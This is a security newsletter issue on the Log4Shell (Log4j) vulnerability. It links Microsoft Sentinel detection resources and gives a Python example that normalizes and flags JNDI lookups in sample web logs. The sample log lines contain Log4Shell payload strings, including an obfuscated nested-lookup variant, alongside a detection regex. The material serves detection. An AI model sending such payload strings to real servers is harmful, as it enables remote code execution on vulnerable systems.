
Microsoft Sentinel this Week - Issue #42 - Out-of-Band Log4j Edition

By Rod Trent • Issue #42
Good day all! For a lot of you, this weekend was busy, sometimes confusing, and definitely demanding due to the Log4j crisis.
As you know, this newsletter delivers every Friday, except that, as noted last issue, it would not deliver again until the new year because of the holidays and my taking time off to spend with family and friends.
So, this newsletter issue is definitely an out-of-band experience. But with the ongoing effort to identify and control the Log4j outbreak, I believe it's important to deliver this newsletter now instead of waiting until January 7th.
There’s still a lot of awesome, accumulated and curated content in this newsletter issue below, but the focus here is more about getting all of you the necessary information about how to deal with Log4j with Microsoft Sentinel.
I absolutely love this community. There’s been a mighty effort by this community to get a handle on this outbreak and many, many people have dedicated their time over the weekend to create and offer solutions for everyone. It just doesn’t get any better than that.
What is it?
In its simplest terms, a zero-day vulnerability in Log4j (also now known as "Log4Shell") can allow unauthenticated remote code execution and access to servers. Researchers have reported 100 attempts to exploit this vulnerability a minute, adding up to hundreds of thousands of attempts since it was discovered just a few days ago - and it was probably being actively exploited for some time before it was publicly disclosed.
NewScientist explains it this way…
Almost every bit of software you use will keep records of errors and other important events, known as logs. Rather than creating their own logging system, many software developers use the open source Log4j, making it one of the most common logging packages in the world.
Not having to reinvent the wheel is a huge benefit, but the popularity of Log4j has now become a global security headache. The flaw affects millions of pieces of software, running on millions of machines, which we all interact with.
And the impact could be huge, producing crypto mining malware or installing Cobalt Strike on vulnerable systems which would lead to the mass theft of usernames and passwords. But that’s just a sampling of the potential for impact.
I believe Florian Roth said it best…
What people seem to miss:
The #Log4Shell vulnerability isn't just a RCE 0day.
It's a vulnerability that causes hundreds and thousands of 0-days in all kinds of software products.
It's a 0-day cluster bomb.
Log4j is used by millions of web servers, which also relates to the apps that rely on those web servers’ services. For example, anyone using Okta for identity services should be aware that the Radius Server agent is vulnerable. VMware, another example, has a long list of impacted products. So, don’t think you’re safe just because you don’t run a web server.
With that, here are some highlights for your Microsoft Sentinel (and other Defender products) environments.
Our own guidance provides information about the vulnerability, and talks about how Defender, Defender for Endpoint, Defender for Cloud, and Microsoft Sentinel can be used to detect and alert on it.
Microsoft MVP and Cloud IR, Eli Shlomo, has provided an amazing diagram of the exploit (originally provided by the National Cyber Security Centre (NCSC), Computer Security Incident Response Team of the Swiss Government), recommendations, and a lab environment to simulate the exploit for detections.
Matt Zorich, the purveyor of the #365daysofkql operation, has posted a KQL query to show how to use parsing to create your own detections.
P.S. As of today, Matt is up to day 66. If you’re interested in KQL, you should follow the hashtag on Twitter.
For those customers that are using Microsoft Sentinel alongside another SIEM, SOC Prime has multi-SIEM detections, including Microsoft Sentinel (though SOC Prime is still stuck on the old "Azure" Sentinel name in most places).
The following hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache:
Olaf Hartong, from FalconForce, has provided several KQL queries for detecting the vulnerability in LDAP, DNS, Zscaler, Fortinet, Check Point, Application Gateway and others.
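The detections linked above all rely on parsing request data before matching. As an added example that is not part of this newsletter or of any of the queries it links to, here is the same idea in Python over constructed log lines instead of KQL: nested ${lower:}/${upper:} lookups are expanded first, so a lookup string that has been broken up this way is still caught. The log lines and hostnames are constructed for the example.

```python
import re

# Constructed sample web-server request lines (not real traffic). Line 3 carries the
# lookup in the User-Agent field and splits it with a nested ${lower:} lookup, which
# Log4j expands before performing the jndi lookup; line 4 is a benign nested lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:03 +0000] "GET /?x=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 12 "-" "curl/7.0"',
    '10.0.0.7 - - [11/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:J}ndi:dns://example.invalid/b}"',
    '10.0.0.8 - - [11/Dec/2021:10:01:05 +0000] "GET /ok?q=${lower:hello} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Innermost case-changing lookup: no other "${" or "}" inside the braces.
_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# JNDI lookup with one of the URI schemes Log4j's JNDI support resolves.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def _expand(match):
    """Apply one ${lower:..} or ${upper:..} lookup to its argument."""
    return match.group(2).lower() if match.group(1).lower() == "lower" else match.group(2).upper()


def normalize(text, max_rounds=10):
    """Expand innermost lookups repeatedly until none remain.

    The round limit keeps a pathological input from looping forever; what is
    left after max_rounds is matched as-is.
    """
    for _ in range(max_rounds):
        expanded = _LOOKUP.sub(_expand, text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_attempts(lines):
    """Return (line_index, normalized_line, scheme) for every line that
    contains a JNDI lookup after normalization."""
    hits = []
    for index, line in enumerate(lines):
        normalized = normalize(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append((index, normalized, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for index, normalized, scheme in find_jndi_attempts(SAMPLE_LOG_LINES):
        print(f"line {index}: jndi scheme={scheme}: {normalized}")
```

In a KQL detection the same normalization is what the parsing step has to do before a `has` or `matches regex` on the request fields; matching the raw text alone misses the split form.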
I hope this newsletter issue provides value for you instead of leaving you with further questions around Log4j and its potential impact.
As noted last issue, I’m taking time off for the holidays and this newsletter will return in force in January. But who knows? You may see and hear from me again if I’m needed.
The rest of this newsletter issue is the normal fare.
Talk soon.

Stuff to Read
Must Learn KQL Part 7: Schema Talk – Azure Cloud & AI Domain Blog
Must Learn KQL Part 8: The Where Operator – Azure Cloud & AI Domain Blog
The Microsoft Security Operations Guide Contains Microsoft Sentinel Templates for Things to Monitor – Azure Cloud & AI Domain Blog
Choosing Not to See Tables without Data in the Microsoft Sentinel Console – Azure Cloud & AI Domain Blog
Microsoft Sentinel Azure AD Connector Log Breakdown
Threat Hunting AWS CloudTrail with Sentinel: Part 3 - Binary Defense
Migrate alert rules to another Azure Sentinel in the same tenant - Notes of Azure Security + Governance
When does enabling Microsoft Sentinel make sense?
Investigating Suspicious Azure Activity with Microsoft Sentinel - Microsoft Tech Community
Threat Hunting in Microsoft Sentinel (part 1)
Threat Hunting in Microsoft Sentinel (part 2)
Stuff to Watch/Listen To
Overview of the SOC Process Framework
KQL Framework for Microsoft Sentinel - Empowering You to Become KQL-Savvy
Demo: Microsoft Sentinel Zero Trust (TIC 3.0) Workbook
Stuff to Have
Sentinel-Queries/CVE-2021-44228-2.kql at main · reprise99/Sentinel-Queries · GitHub
SentinelKQL/EPSforM365AdvancedTables.txt at master · rod-trent/SentinelKQL · GitHub
Sentinel-Queries/Identity-VisualizeSSPR.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-DetectNewAlerts.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-FindRecipientsofPotentialPhishing.kql at main · reprise99/Sentinel-Queries · GitHub
SentinelKQL/TableData.txt at master · rod-trent/SentinelKQL · GitHub
Sentinel-Queries/SecurityAlert-ParseMaliciousFileInfoandFindDeviceEvents.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/Audit-ListBulkActivities.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/DNS-FindDevicesThatHaveQueriedSuspiciousDomains.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-VisualizeTopPhishingDomains.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityEvent-DailySummaryofGroupAdditions.kql at main · reprise99/Sentinel-Queries · GitHub
Stuff to Attend
Becoming a Microsoft Sentinel Expert - Cloud Academy
Stuff That's New or Updated
Microsoft Sentinel - SAP continuous threat monitoring workbooks - Microsoft Tech Community
Stuff That's Related
Public preview: Azure Monitor action rules are now 'alert processing rules' | Azure updates | Microsoft Azure
What's Next in Security
General availability: Audit Logs of Azure Monitor log queries | Azure updates | Microsoft Azure
Announcing New Security Management Capabilities for Microsoft Defender for Endpoint - Microsoft Tech Community
Stuff from the News
Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
New research shows IoT and OT innovation is critical to business but comes with significant risks - Microsoft Security Blog
NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
Protecting people from recent cyberattacks - Microsoft On the Issues
Rabobank grows a safer global IT landscape with Microsoft Security solutions
Gavriella Schuster Joins Open Systems Board Amid MDR Security Push - ChannelE2E
Sumo Logic CEO Sees MDR, EDR and MSSP Partner Opportunities - MSSP Alert
Rod Trent

The Microsoft Sentinel weekly newsletter helps uncover the new and important features and news for Microsoft's cloud-based SIEM+SOAR security tool.
